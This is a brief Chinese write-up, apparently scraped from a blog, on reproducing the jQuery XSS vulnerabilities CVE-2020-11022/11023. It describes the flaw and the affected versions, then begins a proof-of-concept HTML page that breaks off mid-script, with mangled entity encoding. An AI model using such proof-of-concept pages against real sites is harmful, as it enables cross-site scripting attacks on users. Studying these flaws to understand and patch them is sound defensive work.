复现CVE-2020-11022/11023（jQuery XSS漏洞）

本文介绍: 警告请勿使用本文提到的内容违反法律。本文不提供任何担保一、漏洞描述由于执行了消毒（s ani tize）处理，也仍会执行将来自不受信任来源的HTML传递给jQue ry的DOM操作方法（即html()、.append()等），从而导致xss 漏洞。二、影响版本大于或等于1.2且在3.5.0之前的jQue ry 版本中三、漏洞复现 p oc 如下：<!DOCTYPE html&g t;<html&g t;<head&g t; &lt…

由于执行了消毒（sani tize）处理，也仍会执行将来自不受信任来源的HTML传递给jQue ry的DOM操作方法（即html()、.append()等），从而导致xss 漏洞。

大于或等于1.2且在3.5.0之前的jQue ry 版本中

p oc 如下：

&lt;!DOCTYPE html&gt;
<html&gt;
<head&gt;
    <meta charset="utf-8"&gt;
    <title&gt;jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title&gt;
    <script src="存在漏洞的jQuery网址"&gt;</script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).inne